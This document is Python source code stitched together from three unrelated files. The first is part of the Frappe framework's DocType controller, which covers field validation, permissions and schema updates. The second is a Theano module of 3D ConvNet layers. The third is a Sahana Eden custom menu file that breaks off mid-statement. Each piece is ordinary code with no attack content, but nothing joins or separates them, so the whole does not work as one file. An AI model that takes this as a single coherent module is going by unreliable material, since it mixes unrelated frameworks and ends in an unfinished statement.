		if set(old_fields_to_fetch) != set([df.fieldname for df in new_meta.get_fields_to_fetch()]):
			for df in new_meta.get_fields_to_fetch():
				if df.fieldname not in old_fields_to_fetch:
					link_fieldname, source_fieldname = df.fetch_from.split('.', 1)
					link_df = new_meta.get_field(link_fieldname)

					self.flags.update_fields_to_fetch_queries.append('''update
							`tab{link_doctype}` source, `tab{doctype}` target
						set
							target.`{fieldname}` = source.`{source_fieldname}`
						where
							target.`{link_fieldname}` = source.name
							and ifnull(target.`{fieldname}`, '')=""
					'''.format(
						link_doctype = link_df.options,
						source_fieldname = source_fieldname,
						doctype = self.name,
						fieldname = df.fieldname,
						link_fieldname = link_fieldname
					))

	def update_fields_to_fetch(self):
		'''Update fetch values based on queries setup'''
		if self.flags.update_fields_to_fetch_queries:
			for query in self.flags.update_fields_to_fetch_queries:
				frappe.db.sql(query)

	def validate_document_type(self):
		# Map legacy document_type values to their current equivalents.
		if self.document_type=="Transaction":
			self.document_type = "Document"
		if self.document_type=="Master":
			self.document_type = "Setup"

	def validate_website(self):
		"""Ensure that website generator has field 'route'"""
		if self.has_web_view:
			# route field must be present
			if not 'route' in [d.fieldname for d in self.fields]:
				frappe.throw(_('Field "route" is mandatory for Web Views'), title='Missing Field')

			# clear website cache
			frappe.website.render.clear_cache()

	def change_modified_of_parent(self):
		"""Change the timestamp of parent DocType if the current one is a child to clear caches."""
		if frappe.flags.in_import:
			return
		parent_list = frappe.db.sql("""SELECT parent
			from tabDocField where fieldtype="Table" and options=%s""", self.name)
		for p in parent_list:
			frappe.db.sql('UPDATE tabDocType SET modified=%s WHERE `name`=%s', (now(), p[0]))

	def scrub_field_names(self):
		"""Sluggify fieldnames if not set from Label."""
		# Reserved names that would collide with standard document columns.
		restricted = ('name','parent','creation','modified','modified_by',
			'parentfield','parenttype','file_list', 'flags', 'docstatus')
		for d in self.get("fields"):
			if d.fieldtype:
				if (not getattr(d, "fieldname", None)):
					# Derive the fieldname from the label when possible,
					# otherwise from the fieldtype plus row index.
					if d.label:
						d.fieldname = d.label.strip().lower().replace(' ','_')
						if d.fieldname in restricted:
							d.fieldname = d.fieldname + '1'
					else:
						d.fieldname = d.fieldtype.lower().replace(" ","_") + "_" + str(d.idx)

				# Strip characters that are invalid in column names.
				d.fieldname = re.sub('''['",./%@()<>{}]''', '', d.fieldname)

				# fieldnames should be lowercase
				d.fieldname = d.fieldname.lower()

	def validate_series(self, autoname=None, name=None):
		"""Validate if `autoname` property is correctly set."""
		if not autoname: autoname = self.autoname
		if not name: name = self.name

		# If a naming_series field exists but no autoname is set, default
		# to series-based naming.
		if not autoname and self.get("fields", {"fieldname":"naming_series"}):
			self.autoname = "naming_series:"

		# validate field name if autoname field:fieldname is used
		if autoname and autoname.startswith('field:'):
			field = autoname.split(":")[1]
			if not field or field not in [ df.fieldname for df in self.fields ]:
				frappe.throw(_("Invalid fieldname '{0}' in autoname".format(field)))

		# A fixed series prefix must be unique across doctypes.
		if autoname and (not autoname.startswith('field:')) \
			and (not autoname.startswith('eval:')) \
			and (not autoname.lower() in ('prompt', 'hash')) \
			and (not autoname.startswith('naming_series:')):

			prefix = autoname.split('.')[0]
			used_in = frappe.db.sql('select name from tabDocType where substring_index(autoname, ".", 1) = %s and name!=%s', (prefix, name))
			if used_in:
				frappe.throw(_("Series {0} already used in {1}").format(prefix, used_in[0][0]))

	def on_update(self):
		"""Update database schema, make controller templates if `custom` is not set and clear cache."""
		from frappe.model.db_schema import updatedb
		self.delete_duplicate_custom_fields()
		updatedb(self.name, self)

		self.change_modified_of_parent()
		make_module_and_roles(self)

		self.update_fields_to_fetch()

		from frappe import conf
		# Only export .json/controller files from developer-mode sites.
		if not self.custom and not (frappe.flags.in_import or frappe.flags.in_test) and conf.get('developer_mode'):
			self.export_doc()
			self.make_controller_template()

			if self.has_web_view:
				self.set_base_class_for_controller()

		# update index
		if not self.custom:
			self.run_module_method("on_doctype_update")
			if self.flags.in_insert:
				self.run_module_method("after_doctype_insert")

		delete_notification_count_for(doctype=self.name)
		frappe.clear_cache(doctype=self.name)

		# before_update only exists for non-new docs (set in validate),
		# so this effectively skips freshly inserted doctypes.
		if not frappe.flags.in_install and hasattr(self, 'before_update'):
			self.sync_global_search()

		# clear from local cache
		if self.name in frappe.local.meta_cache:
			del frappe.local.meta_cache[self.name]

		clear_linked_doctype_cache()

	def delete_duplicate_custom_fields(self):
		# Remove Custom Fields that now clash with standard fields of this
		# doctype (e.g. after a standard field with the same name is added).
		if not (frappe.db.table_exists(self.name) and frappe.db.table_exists("Custom Field")):
			return

		fields = [d.fieldname for d in self.fields if d.fieldtype in type_map]

		# NOTE(review): as_dict=True on a DELETE is a no-op, and an empty
		# `fields` list would produce an invalid `in ()` clause -- confirm
		# callers guarantee at least one mapped field.
		frappe.db.sql('''delete from `tabCustom Field`
			where dt = {0} and fieldname in ({1})
		'''.format('%s', ', '.join(['%s'] * len(fields))), tuple([self.name] + fields), as_dict=True)

	def sync_global_search(self):
		'''If global search settings are changed, rebuild search properties for this table'''
		# Compare the set of in_global_search fields before and after save;
		# only rebuild when the set actually changed (expensive operation).
		global_search_fields_before_update = [d.fieldname for d in
			self.before_update.fields if d.in_global_search]
		if self.before_update.show_name_in_global_search:
			global_search_fields_before_update.append('name')

		global_search_fields_after_update = [d.fieldname for d in
			self.fields if d.in_global_search]
		if self.show_name_in_global_search:
			global_search_fields_after_update.append('name')

		if set(global_search_fields_before_update) != set(global_search_fields_after_update):
			# Run synchronously when there is no request context (tests,
			# install), otherwise enqueue as a background job.
			now = (not frappe.request) or frappe.flags.in_test or frappe.flags.in_install
			frappe.enqueue('frappe.utils.global_search.rebuild_for_doctype',
				now=now, doctype=self.name)

	def set_base_class_for_controller(self):
		'''Updates the controller class to subclass from `WebsiteGenertor`,
		if it is a subclass of `Document`'''
		controller_path = frappe.get_module_path(frappe.scrub(self.module),
			'doctype', frappe.scrub(self.name), frappe.scrub(self.name) + '.py')

		with open(controller_path, 'r') as f:
			code = f.read()

		class_string = '\nclass {0}(Document)'.format(self.name.replace(' ', ''))
		# Rewrite both the import and the class declaration in one pass.
		if '\nfrom frappe.model.document import Document' in code and class_string in code:
			code = code.replace('from frappe.model.document import Document',
				'from frappe.website.website_generator import WebsiteGenerator')
			code = code.replace('class {0}(Document)'.format(self.name.replace(' ', '')),
				'class {0}(WebsiteGenerator)'.format(self.name.replace(' ', '')))

		with open(controller_path, 'w') as f:
			f.write(code)

	def run_module_method(self, method):
		# Invoke an optional hook function defined in the doctype's module
		# file (e.g. on_doctype_update), if present.
		from frappe.modules import load_doctype_module
		module = load_doctype_module(self.name, self.module)
		if hasattr(module, method):
			getattr(module, method)()

	def before_rename(self, old, new, merge=False):
		"""Throw exception if merge. DocTypes cannot be merged."""
		if not self.custom and frappe.session.user != "Administrator":
			frappe.throw(_("DocType can only be renamed by Administrator"))

		self.check_developer_mode()
		self.validate_name(new)

		if merge:
			frappe.throw(_("DocType can not be merged"))

	def after_rename(self, old, new, merge=False):
		"""Change table name using `RENAME TABLE` if table exists.
Or update `doctype` property for Single type.""" if self.issingle: frappe.db.sql("""update tabSingles set doctype=%s where doctype=%s""", (new, old)) frappe.db.sql("""update tabSingles set value=%s where doctype=%s and field='name' and value = %s""", (new, new, old)) else: frappe.db.sql("rename table `tab%s` to `tab%s`" % (old, new)) def before_reload(self): """Preserve naming series changes in Property Setter.""" if not (self.issingle and self.istable): self.preserve_naming_series_options_in_property_setter() def preserve_naming_series_options_in_property_setter(self): """Preserve naming_series as property setter if it does not exist""" naming_series = self.get("fields", {"fieldname": "naming_series"}) if not naming_series: return # check if atleast 1 record exists if not (frappe.db.table_exists(self.name) and frappe.db.sql("select name from `tab{}` limit 1".format(self.name))): return existing_property_setter = frappe.db.get_value("Property Setter", {"doc_type": self.name, "property": "options", "field_name": "naming_series"}) if not existing_property_setter: make_property_setter(self.name, "naming_series", "options", naming_series[0].options, "Text", validate_fields_for_doctype=False) if naming_series[0].default: make_property_setter(self.name, "naming_series", "default", naming_series[0].default, "Text", validate_fields_for_doctype=False) def export_doc(self): """Export to standard folder `[module]/doctype/[name]/[name].json`.""" from frappe.modules.export_file import export_to_files export_to_files(record_list=[['DocType', self.name]], create_init=True) def import_doc(self): """Import from standard folder `[module]/doctype/[name]/[name].json`.""" from frappe.modules.import_module import import_from_files import_from_files(record_list=[[self.module, 'doctype', self.name]]) def make_controller_template(self): """Make boilerplate controller template.""" make_boilerplate("controller._py", self) if not self.istable: make_boilerplate("test_controller._py", 
self.as_dict()) if not self.istable: make_boilerplate("controller.js", self.as_dict()) #make_boilerplate("controller_list.js", self.as_dict()) if not os.path.exists(frappe.get_module_path(frappe.scrub(self.module), 'doctype', frappe.scrub(self.name), 'tests')): make_boilerplate("test_controller.js", self.as_dict()) if self.has_web_view: templates_path = frappe.get_module_path(frappe.scrub(self.module), 'doctype', frappe.scrub(self.name), 'templates') if not os.path.exists(templates_path): os.makedirs(templates_path) make_boilerplate('templates/controller.html', self.as_dict()) make_boilerplate('templates/controller_row.html', self.as_dict()) def make_amendable(self): """If is_submittable is set, add amended_from docfields.""" if self.is_submittable: if not frappe.db.sql("""select name from tabDocField where fieldname = 'amended_from' and parent = %s""", self.name): self.append("fields", { "label": "Amended From", "fieldtype": "Link", "fieldname": "amended_from", "options": self.name, "read_only": 1, "print_hide": 1, "no_copy": 1 }) def get_max_idx(self): """Returns the highest `idx`""" max_idx = frappe.db.sql("""select max(idx) from `tabDocField` where parent = %s""", self.name) return max_idx and max_idx[0][0] or 0 def validate_name(self, name=None): if not name: name = self.name # a DocType's name should not start with a number or underscore # and should only contain letters, numbers and underscore if six.PY2: is_a_valid_name = re.match("^(?![\W])[^\d_\s][\w -]+$", name) else: is_a_valid_name = re.match("^(?![\W])[^\d_\s][\w -]+$", name, flags = re.ASCII) if not is_a_valid_name: frappe.throw(_("DocType's name should start with a letter and it can only consist of letters, numbers, spaces and underscores"), frappe.NameError) def validate_fields_for_doctype(doctype): doc = frappe.get_doc("DocType", doctype) doc.delete_duplicate_custom_fields() validate_fields(frappe.get_meta(doctype, cached=False)) # this is separate because it is also called via custom field def 
validate_fields(meta): """Validate doctype fields. Checks 1. There are no illegal characters in fieldnames 2. If fieldnames are unique. 3. Validate column length. 4. Fields that do have database columns are not mandatory. 5. `Link` and `Table` options are valid. 6. **Hidden** and **Mandatory** are not set simultaneously. 7. `Check` type field has default as 0 or 1. 8. `Dynamic Links` are correctly defined. 9. Precision is set in numeric fields and is between 1 & 6. 10. Fold is not at the end (if set). 11. `search_fields` are valid. 12. `title_field` and title field pattern are valid. 13. `unique` check is only valid for Data, Link and Read Only fieldtypes. 14. `unique` cannot be checked if there exist non-unique values. :param meta: `frappe.model.meta.Meta` object to check.""" def check_illegal_characters(fieldname): validate_column_name(fieldname) def check_unique_fieldname(fieldname): duplicates = list(filter(None, map(lambda df: df.fieldname==fieldname and str(df.idx) or None, fields))) if len(duplicates) > 1: frappe.throw(_("Fieldname {0} appears multiple times in rows {1}").format(fieldname, ", ".join(duplicates))) def check_fieldname_length(fieldname): validate_column_length(fieldname) def check_illegal_mandatory(d): if (d.fieldtype in no_value_fields) and d.fieldtype!="Table" and d.reqd: frappe.throw(_("Field {0} of type {1} cannot be mandatory").format(d.label, d.fieldtype)) def check_link_table_options(d): if d.fieldtype in ("Link", "Table"): if not d.options: frappe.throw(_("Options required for Link or Table type field {0} in row {1}").format(d.label, d.idx)) if d.options=="[Select]" or d.options==d.parent: return if d.options != d.parent: options = frappe.db.get_value("DocType", d.options, "name") if not options: frappe.throw(_("Options must be a valid DocType for field {0} in row {1}").format(d.label, d.idx)) else: # fix case d.options = options def check_hidden_and_mandatory(d): if d.hidden and d.reqd and not d.default: frappe.throw(_("Field {0} in 
row {1} cannot be hidden and mandatory without default").format(d.label, d.idx)) def check_width(d): if d.fieldtype == "Currency" and cint(d.width) < 100: frappe.throw(_("Max width for type Currency is 100px in row {0}").format(d.idx)) def check_in_list_view(d): if d.in_list_view and (d.fieldtype in not_allowed_in_list_view): frappe.throw(_("'In List View' not allowed for type {0} in row {1}").format(d.fieldtype, d.idx)) def check_in_global_search(d): if d.in_global_search and d.fieldtype in no_value_fields: frappe.throw(_("'In Global Search' not allowed for type {0} in row {1}") .format(d.fieldtype, d.idx)) def check_dynamic_link_options(d): if d.fieldtype=="Dynamic Link": doctype_pointer = list(filter(lambda df: df.fieldname==d.options, fields)) if not doctype_pointer or (doctype_pointer[0].fieldtype not in ("Link", "Select")) \ or (doctype_pointer[0].fieldtype=="Link" and doctype_pointer[0].options!="DocType"): frappe.throw(_("Options 'Dynamic Link' type of field must point to another Link Field with options as 'DocType'")) def check_illegal_default(d): if d.fieldtype == "Check" and d.default and d.default not in ('0', '1'): frappe.throw(_("Default for 'Check' type of field must be either '0' or '1'")) if d.fieldtype == "Select" and d.default and (d.default not in d.options.split("\n")): frappe.throw(_("Default for {0} must be an option").format(d.fieldname)) def check_precision(d): if d.fieldtype in ("Currency", "Float", "Percent") and d.precision is not None and not (1 <= cint(d.precision) <= 6): frappe.throw(_("Precision should be between 1 and 6")) def check_unique_and_text(d): if meta.issingle: d.unique = 0 d.search_index = 0 if getattr(d, "unique", False): if d.fieldtype not in ("Data", "Link", "Read Only"): frappe.throw(_("Fieldtype {0} for {1} cannot be unique").format(d.fieldtype, d.label)) if not d.get("__islocal"): try: has_non_unique_values = frappe.db.sql("""select `{fieldname}`, count(*) from `tab{doctype}` where ifnull({fieldname}, '') != '' group 
by `{fieldname}` having count(*) > 1 limit 1""".format( doctype=d.parent, fieldname=d.fieldname)) except pymysql.InternalError as e: if e.args and e.args[0] == ER.BAD_FIELD_ERROR: # ignore if missing column, else raise # this happens in case of Custom Field pass else: raise else: # else of try block if has_non_unique_values and has_non_unique_values[0][0]: frappe.throw(_("Field '{0}' cannot be set as Unique as it has non-unique values").format(d.label)) if d.search_index and d.fieldtype in ("Text", "Long Text", "Small Text", "Code", "Text Editor"): frappe.throw(_("Fieldtype {0} for {1} cannot be indexed").format(d.fieldtype, d.label)) def check_fold(fields): fold_exists = False for i, f in enumerate(fields): if f.fieldtype=="Fold": if fold_exists: frappe.throw(_("There can be only one Fold in a form")) fold_exists = True if i < len(fields)-1: nxt = fields[i+1] if nxt.fieldtype != "Section Break": frappe.throw(_("Fold must come before a Section Break")) else: frappe.throw(_("Fold can not be at the end of the form")) def check_search_fields(meta, fields): """Throw exception if `search_fields` don't contain valid fields.""" if not meta.search_fields: return # No value fields should not be included in search field search_fields = [field.strip() for field in (meta.search_fields or "").split(",")] fieldtype_mapper = { field.fieldname: field.fieldtype \ for field in filter(lambda field: field.fieldname in search_fields, fields) } for fieldname in search_fields: fieldname = fieldname.strip() if (fieldtype_mapper.get(fieldname) in no_value_fields) or \ (fieldname not in fieldname_list): frappe.throw(_("Search field {0} is not valid").format(fieldname)) def check_title_field(meta): """Throw exception if `title_field` isn't a valid fieldname.""" if not meta.get("title_field"): return if meta.title_field not in fieldname_list: frappe.throw(_("Title field must be a valid fieldname"), InvalidFieldNameError) def _validate_title_field_pattern(pattern): if not pattern: return for 
fieldname in re.findall("{(.*?)}", pattern, re.UNICODE): if fieldname.startswith("{"): # edge case when double curlies are used for escape continue if fieldname not in fieldname_list: frappe.throw(_("{{{0}}} is not a valid fieldname pattern. It should be {{field_name}}.").format(fieldname), InvalidFieldNameError) df = meta.get("fields", filters={"fieldname": meta.title_field})[0] if df: _validate_title_field_pattern(df.options) _validate_title_field_pattern(df.default) def check_image_field(meta): '''check image_field exists and is of type "Attach Image"''' if not meta.image_field: return df = meta.get("fields", {"fieldname": meta.image_field}) if not df: frappe.throw(_("Image field must be a valid fieldname"), InvalidFieldNameError) if df[0].fieldtype != 'Attach Image': frappe.throw(_("Image field must be of type Attach Image"), InvalidFieldNameError) def check_is_published_field(meta): if not meta.is_published_field: return if meta.is_published_field not in fieldname_list: frappe.throw(_("Is Published Field must be a valid fieldname"), InvalidFieldNameError) def check_timeline_field(meta): if not meta.timeline_field: return if meta.timeline_field not in fieldname_list: frappe.throw(_("Timeline field must be a valid fieldname"), InvalidFieldNameError) df = meta.get("fields", {"fieldname": meta.timeline_field})[0] if df.fieldtype not in ("Link", "Dynamic Link"): frappe.throw(_("Timeline field must be a Link or Dynamic Link"), InvalidFieldNameError) def check_sort_field(meta): '''Validate that sort_field(s) is a valid field''' if meta.sort_field: sort_fields = [meta.sort_field] if ',' in meta.sort_field: sort_fields = [d.split()[0] for d in meta.sort_field.split(',')] for fieldname in sort_fields: if not fieldname in fieldname_list + list(default_fields): frappe.throw(_("Sort field {0} must be a valid fieldname").format(fieldname), InvalidFieldNameError) def check_illegal_depends_on_conditions(docfield): ''' assignment operation should not be allowed in the depends 
on condition.''' depends_on_fields = ["depends_on", "collapsible_depends_on"] for field in depends_on_fields: depends_on = docfield.get(field, None) if depends_on and ("=" in depends_on) and \ re.match("""[\w\.:_]+\s*={1}\s*[\w\.@'"]+""", depends_on): frappe.throw(_("Invalid {0} condition").format(frappe.unscrub(field)), frappe.ValidationError) fields = meta.get("fields") fieldname_list = [d.fieldname for d in fields] not_allowed_in_list_view = list(copy.copy(no_value_fields)) not_allowed_in_list_view.append("Attach Image") if meta.istable: not_allowed_in_list_view.remove('Button') for d in fields: if not d.permlevel: d.permlevel = 0 if d.fieldtype != "Table": d.allow_bulk_edit = 0 if d.fieldtype == "Barcode": d.ignore_xss_filter = 1 if not d.fieldname: frappe.throw(_("Fieldname is required in row {0}").format(d.idx)) d.fieldname = d.fieldname.lower() check_illegal_characters(d.fieldname) check_unique_fieldname(d.fieldname) check_fieldname_length(d.fieldname) check_illegal_mandatory(d) check_link_table_options(d) check_dynamic_link_options(d) check_hidden_and_mandatory(d) check_in_list_view(d) check_in_global_search(d) check_illegal_default(d) check_unique_and_text(d) check_illegal_depends_on_conditions(d) check_fold(fields) check_search_fields(meta, fields) check_title_field(meta) check_timeline_field(meta) check_is_published_field(meta) check_sort_field(meta) check_image_field(meta) def validate_permissions_for_doctype(doctype, for_remove=False): """Validates if permissions are set correctly.""" doctype = frappe.get_doc("DocType", doctype) validate_permissions(doctype, for_remove) # save permissions for perm in doctype.get("permissions"): perm.db_update() clear_permissions_cache(doctype.name) def clear_permissions_cache(doctype): frappe.clear_cache(doctype=doctype) delete_notification_count_for(doctype) for user in frappe.db.sql_list("""select distinct `tabHas Role`.parent from `tabHas Role`, tabDocPerm where tabDocPerm.parent = %s and tabDocPerm.role = `tabHas 
Role`.role""", doctype): frappe.clear_cache(user=user) def validate_permissions(doctype, for_remove=False): permissions = doctype.get("permissions") if not permissions: frappe.msgprint(_('No Permissions Specified'), alert=True, indicator='orange') issingle = issubmittable = isimportable = False if doctype: issingle = cint(doctype.issingle) issubmittable = cint(doctype.is_submittable) isimportable = cint(doctype.allow_import) def get_txt(d): return _("For {0} at level {1} in {2} in row {3}").format(d.role, d.permlevel, d.parent, d.idx) def check_atleast_one_set(d): if not d.read and not d.write and not d.submit and not d.cancel and not d.create: frappe.throw(_("{0}: No basic permissions set").format(get_txt(d))) def check_double(d): has_similar = False similar_because_of = "" for p in permissions: if p.role==d.role and p.permlevel==d.permlevel and p!=d: if p.if_owner==d.if_owner: similar_because_of = _("If Owner") has_similar = True break if has_similar: frappe.throw(_("{0}: Only one rule allowed with the same Role, Level and {1}")\ .format(get_txt(d), similar_because_of)) def check_level_zero_is_set(d): if cint(d.permlevel) > 0 and d.role != 'All': has_zero_perm = False for p in permissions: if p.role==d.role and (p.permlevel or 0)==0 and p!=d: has_zero_perm = True break if not has_zero_perm: frappe.throw(_("{0}: Permission at level 0 must be set before higher levels are set").format(get_txt(d))) for invalid in ("create", "submit", "cancel", "amend"): if d.get(invalid): d.set(invalid, 0) def check_permission_dependency(d): if d.cancel and not d.submit: frappe.throw(_("{0}: Cannot set Cancel without Submit").format(get_txt(d))) if (d.submit or d.cancel or d.amend) and not d.write: frappe.throw(_("{0}: Cannot set Submit, Cancel, Amend without Write").format(get_txt(d))) if d.amend and not d.write: frappe.throw(_("{0}: Cannot set Amend without Cancel").format(get_txt(d))) if d.get("import") and not d.create: frappe.throw(_("{0}: Cannot set Import without 
Create").format(get_txt(d))) def remove_rights_for_single(d): if not issingle: return if d.report: frappe.msgprint(_("Report cannot be set for Single types")) d.report = 0 d.set("import", 0) d.set("export", 0) for ptype, label in [["set_user_permissions", _("Set User Permissions")]]: if d.get(ptype): d.set(ptype, 0) frappe.msgprint(_("{0} cannot be set for Single types").format(label)) def check_if_submittable(d): if d.submit and not issubmittable: frappe.throw(_("{0}: Cannot set Assign Submit if not Submittable").format(get_txt(d))) elif d.amend and not issubmittable: frappe.throw(_("{0}: Cannot set Assign Amend if not Submittable").format(get_txt(d))) def check_if_importable(d): if d.get("import") and not isimportable: frappe.throw(_("{0}: Cannot set import as {1} is not importable").format(get_txt(d), doctype)) for d in permissions: if not d.permlevel: d.permlevel=0 check_atleast_one_set(d) if not for_remove: check_double(d) check_permission_dependency(d) check_if_submittable(d) check_if_importable(d) check_level_zero_is_set(d) remove_rights_for_single(d) def make_module_and_roles(doc, perm_fieldname="permissions"): """Make `Module Def` and `Role` records if already not made. 
Called while installing.""" try: if hasattr(doc,'restrict_to_domain') and doc.restrict_to_domain and \ not frappe.db.exists('Domain', doc.restrict_to_domain): frappe.get_doc(dict(doctype='Domain', domain=doc.restrict_to_domain)).insert() if not frappe.db.exists("Module Def", doc.module): m = frappe.get_doc({"doctype": "Module Def", "module_name": doc.module}) m.app_name = frappe.local.module_app[frappe.scrub(doc.module)] m.flags.ignore_mandatory = m.flags.ignore_permissions = True m.insert() default_roles = ["Administrator", "Guest", "All"] roles = [p.role for p in doc.get("permissions") or []] + default_roles for role in list(set(roles)): if not frappe.db.exists("Role", role): r = frappe.get_doc(dict(doctype= "Role", role_name=role, desk_access=1)) r.flags.ignore_mandatory = r.flags.ignore_permissions = True r.insert() except frappe.DoesNotExistError as e: pass except frappe.SQLError as e: if e.args[0]==1146: pass else: raise def init_list(doctype): """Make boilerplate list views.""" doc = frappe.get_meta(doctype) make_boilerplate("controller_list.js", doc) make_boilerplate("controller_list.html", doc) def check_if_fieldname_conflicts_with_methods(doctype, fieldname): doc = frappe.get_doc({"doctype": doctype}) method_list = [method for method in dir(doc) if isinstance(method, str) and callable(getattr(doc, method))] if fieldname in method_list: frappe.throw(_("Fieldname {0} conflicting with meta object").format(fieldname)) def clear_linked_doctype_cache(): frappe.cache().delete_value('linked_doctypes_without_ignore_user_permissions_enabled')
""" 3D ConvNet layers using Theano, Pylearn and Numpy ConvLayer: convolutions, filter bank NormLayer: normalization (LCN, GCN, local mean subtraction) PoolLayer: pooling, subsampling RectLayer: rectification (absolute value) """ from conv3d2d import conv3d from maxpool3d import max_pool_3d from activations import relu, softplus from numpy import sqrt, prod, ones, floor, repeat, pi, exp, zeros, sum from numpy.random import RandomState from theano.tensor.nnet import conv2d from theano import shared, config, _asarray import theano.tensor as T floatX = config.floatX class ConvLayer(object): """ Convolutional layer, Filter Bank Layer """ def __init__(self, input, n_in_maps, n_out_maps, kernel_shape, video_shape, batch_size, activation, layer_name="Conv", rng=RandomState(1234), borrow=True, W=None, b=None): """ video_shape: (frames, height, width) kernel_shape: (frames, height, width) W_shape: (out, in, kern_frames, kern_height, kern_width) """ self.__dict__.update(locals()) del self.self # init W if W != None: W_val = W else: # fan in: filter time x filter height x filter width x input maps fan_in = prod(kernel_shape)*n_in_maps norm_scale = 2. * sqrt( 1. 
/ fan_in ) if activation in (relu,softplus): norm_scale = 0.01 W_shape = (n_out_maps, n_in_maps)+kernel_shape W_val = _asarray(rng.normal(loc=0, scale=norm_scale, size=W_shape),\ dtype=floatX) self.W = shared(value=W_val, borrow=borrow, name=layer_name+'_W') self.params = [self.W] # init bias if b != None: b_val = b elif activation in (relu,softplus): b_val = ones((n_out_maps,), dtype=floatX) else: b_val = zeros((n_out_maps,), dtype=floatX) self.b = shared(b_val, name=layer_name+"_b", borrow=borrow) self.params.append(self.b) # 3D convolution; dimshuffle: last 3 dimensions must be (in, h, w) n_fr, h, w = video_shape n_fr_k, h_k, w_k = kernel_shape out = conv3d( signals=input.dimshuffle([0,2,1,3,4]), filters=self.W, signals_shape=(batch_size, n_fr, n_in_maps, h, w), filters_shape=(n_out_maps, n_fr_k, n_in_maps, h_k, w_k), border_mode='valid').dimshuffle([0,2,1,3,4]) out += self.b.dimshuffle('x',0,'x','x','x') self.output = activation(out) class NormLayer(object): """ Normalization layer """ def __init__(self, input, method="lcn", **kwargs): """ method: "lcn", "gcn", "mean" LCN: local contrast normalization kwargs: kernel_size=9, threshold=1e-4, use_divisor=True GCN: global contrast normalization kwargs: scale=1., subtract_mean=True, use_std=False, sqrt_bias=0., min_divisor=1e-8 MEAN: local mean subtraction kwargs: kernel_size=5 """ input_shape = input.shape # make 4D tensor out of 5D tensor -> (n_images, 1, height, width) input_shape_4D = (input_shape[0]*input_shape[1]*input_shape[2], 1, input_shape[3], input_shape[4]) input_4D = input.reshape(input_shape_4D, ndim=4) if method=="lcn": out = self.lecun_lcn(input_4D, **kwargs) elif method=="gcn": out = self.global_contrast_normalize(input_4D,**kwargs) elif method=="mean": out = self.local_mean_subtraction(input_4D, **kwargs) else: raise NotImplementedError() self.output = out.reshape(input_shape) def lecun_lcn(self, X, kernel_size=7, threshold = 1e-4, use_divisor=False): """ Yann LeCun's local contrast normalization 
Orginal code in Theano by: Guillaume Desjardins """ filter_shape = (1, 1, kernel_size, kernel_size) filters = gaussian_filter(kernel_size).reshape(filter_shape) filters = shared(_asarray(filters, dtype=floatX), borrow=True) convout = conv2d(X, filters=filters, filter_shape=filter_shape, border_mode='full') # For each pixel, remove mean of kernel_sizexkernel_size neighborhood mid = int(floor(kernel_size/2.)) new_X = X - convout[:,:,mid:-mid,mid:-mid] if use_divisor: # Scale down norm of kernel_sizexkernel_size patch sum_sqr_XX = conv2d(T.sqr(T.abs_(new_X)), filters=filters, filter_shape=filter_shape, border_mode='full') denom = T.sqrt(sum_sqr_XX[:,:,mid:-mid,mid:-mid]) per_img_mean = denom.mean(axis=[2,3]) divisor = T.largest(per_img_mean.dimshuffle(0,1,'x','x'), denom) divisor = T.maximum(divisor, threshold) new_X /= divisor return new_X#T.cast(new_X, floatX) def local_mean_subtraction(self, X, kernel_size=5): filter_shape = (1, 1, kernel_size, kernel_size) filters = mean_filter(kernel_size).reshape(filter_shape) filters = shared(_asarray(filters, dtype=floatX), borrow=True) mean = conv2d(X, filters=filters, filter_shape=filter_shape, border_mode='full') mid = int(floor(kernel_size/2.)) return X - mean[:,:,mid:-mid,mid:-mid] def global_contrast_normalize(self, X, scale=1., subtract_mean=True, use_std=False, sqrt_bias=0., min_divisor=1e-8): ndim = X.ndim if not ndim in [3,4]: raise NotImplementedError("X.dim>4 or X.ndim<3") scale = float(scale) mean = X.mean(axis=ndim-1) new_X = X.copy() if subtract_mean: if ndim==3: new_X = X - mean[:,:,None] else: new_X = X - mean[:,:,:,None] if use_std: normalizers = T.sqrt(sqrt_bias + X.var(axis=ndim-1)) / scale else: normalizers = T.sqrt(sqrt_bias + (new_X ** 2).sum(axis=ndim-1)) / scale # Don't normalize by anything too small. T.set_subtensor(normalizers[(normalizers < min_divisor).nonzero()], 1.) 
if ndim==3: new_X /= normalizers[:,:,None] else: new_X /= normalizers[:,:,:,None] return new_X class PoolLayer(object): """ Subsampling and pooling layer """ def __init__(self, input, pool_shape, method="max"): """ method: "max", "avg", "L2", "L4", ... """ self.__dict__.update(locals()) del self.self if method=="max": out = max_pool_3d(input,pool_shape) else: raise NotImplementedError() self.output = out class RectLayer(object): """ Rectification layer """ def __init__(self, input): self.output = T.abs_(input) def gaussian_filter(kernel_shape): x = zeros((kernel_shape, kernel_shape), dtype='float32') def gauss(x, y, sigma=2.0): Z = 2 * pi * sigma**2 return 1./Z * exp(-(x**2 + y**2) / (2. * sigma**2)) mid = floor(kernel_shape/ 2.) for i in xrange(0,kernel_shape): for j in xrange(0,kernel_shape): x[i,j] = gauss(i-mid, j-mid) return x / sum(x) def mean_filter(kernel_size): s = kernel_size**2 x = repeat(1./s, s).reshape((kernel_size, kernel_size)) return x
# -*- coding: utf-8 -*- from gluon import current from s3 import * from s3layouts import * try: from .layouts import * except ImportError: pass import s3menus as default RC = {"organisation_type.name" : "Red Cross / Red Crescent"} # ============================================================================= class S3MainMenu(default.S3MainMenu): """ Custom Application Main Menu """ # ------------------------------------------------------------------------- @classmethod def menu(cls): """ Main Menus """ # Footer current.menu.about = cls.menu_about() if current.auth.is_logged_in(): # Provide top-level Navigation bar return MM() else: # Blank top menu return "" # ------------------------------------------------------------------------- @classmethod def menu_about(cls): menu_about = MA(c="default")( MA("About Us", f="about"), MA("Contact", f="contact"), MA("Help", f="help"), MA("Privacy", f="privacy"), ) return menu_about # ============================================================================= class S3OptionsMenu(default.S3OptionsMenu): """ Custom Controller Menus """ # ------------------------------------------------------------------------- def admin(self): """ ADMIN menu """ if current.auth.s3_has_role("ADMIN"): # Standard Admin Menu menu = super(S3OptionsMenu, self).admin() # Additional Items menu(M("Forums", c="pr", f="forum"), M("Request Approvers", c="inv", f="req_approver"), M("Map Settings", c="gis", f="config"), M("Content Management", c="cms", f="index"), ) return menu else: # OrgAdmin return self.pr() # ------------------------------------------------------------------------- def gis(self): """ GIS / GIS Controllers """ if current.request.function == "index": # Empty so as to leave maximum space for the Map # - functionality accessible via the Admin menu instead return None else: return super(S3OptionsMenu, self).gis() # ------------------------------------------------------------------------- def pr(self): """ Person Registry """ auth = 
